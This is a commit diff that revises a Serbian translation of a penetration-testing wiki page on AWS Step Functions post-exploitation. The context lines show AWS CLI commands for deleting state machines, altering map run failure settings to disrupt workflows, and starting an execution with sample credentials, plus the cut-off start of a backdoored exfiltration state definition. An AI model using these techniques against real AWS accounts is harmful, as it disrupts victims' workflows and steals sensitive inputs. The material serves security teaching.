Translated ['src/pentesting-cloud/aws-security/aws-post-exploitation/aws

2026-02-04 19:11:41 -08:00 · 2025-03-28 10:47:15 +00:00
parent 7e967f336f
commit 6731a86db3
2 changed files with 6 additions and 6 deletions
--- a/src/images/workspace_oauth.png
+++ b/src/images/workspace_oauth.png
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
@@ -1,4 +1,4 @@
-# AWS - Post Eksploatacija Step Functions
+# AWS - Step Functions Post Exploitation

 {{#include ../../../banners/hacktricks-training.md}}

@@ -33,11 +33,11 @@ aws stepfunctions delete-state-machine-version --state-machine-version-arn <valu
 # Delete state machine alias
 aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>
 ```
- **Potencijalni uticaj**: Poremećaj kritičnih radnih tokova, gubitak podataka i operativno vreme zastoja.
+- **Potencijalni Uticaj**: Poremećaj kritičnih radnih tokova, gubitak podataka i operativno vreme zastoja.

 ### `states:UpdateMapRun`

-Napadač sa ovom dozvolom mogao bi da manipuliše konfiguracijom neuspeha Map Run i paralelnim podešavanjima, što bi mu omogućilo da poveća ili smanji maksimalan broj dozvoljenih izvršenja radnih tokova, direktno utičući na performanse usluge. Pored toga, napadač bi mogao da menja tolerisani procenat neuspeha i broj, sa mogućnošću da smanji ovu vrednost na 0, tako da svaki put kada stavka ne uspe, ceo map run bi neuspeo, direktno utičući na izvršenje mašine stanja i potencijalno ometajući kritične radne tokove.
+Napadač sa ovom dozvolom mogao bi da manipuliše konfiguracijom neuspeha Map Run-a i paralelnim podešavanjima, što bi mu omogućilo da poveća ili smanji maksimalan broj dozvoljenih izvršenja radnih tokova, direktno utičući na performanse usluge. Pored toga, napadač bi mogao da menja tolerisani procenat neuspeha i broj, smanjujući ovu vrednost na 0, tako da bi svaki put kada stavka ne uspe, ceo map run ne uspeo, direktno utičući na izvršenje stanja mašine i potencijalno ometajući kritične radne tokove.
 ```bash
 aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value>] [--tolerated-failure-percentage <value>] [--tolerated-failure-count <value>]
 ```
@@ -87,7 +87,7 @@ Napadač koji kompromituje korisnika ili ulogu sa sledećim dozvolama:
 ]
 }
 ```
-...može sprovesti **napad post-ekspolatacije visokog uticaja i prikrivenosti** kombinovanjem backdooring-a Lambda sa manipulacijom logikom Step Function-a.
+...može sprovesti **napad post-ekspolatacije visokog uticaja i prikrivenosti** kombinovanjem backdooring-a Lambda sa manipulacijom logikom Step Function.

 Ovaj scenario pretpostavlja da žrtva koristi **AWS Step Functions za orkestraciju radnih tokova koji obrađuju osetljive ulaze**, kao što su akreditivi, tokeni ili PII.

@@ -97,7 +97,7 @@ aws stepfunctions start-execution \
 --state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
 --input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim
 ```
-Ako je Step Function konfigurisana da poziva Lambda kao `LegitBusinessLogic`, napadač može nastaviti sa **dva prikrivena varijante napada**:
+Ako je Step Function konfigurisana da poziva Lambda kao `LegitBusinessLogic`, napadač može nastaviti sa **dve prikrivene varijante napada**:

 ---

@@ -124,7 +124,7 @@ aws lambda update-function-code \

 #### Dodajte Zloćudnu Državu u Step Funkciju

-Alternativno, napadač može da ubaci **exfiltration state** na početak radnog toka ažuriranjem definicije Step Funkcije.
+Alternativno, napadač može da ubaci **državu eksfiltracije** na početak radnog toka ažuriranjem definicije Step Funkcije.
 ```malicious_state_definition.json
 {
 "Comment": "Backdoored for Exfiltration",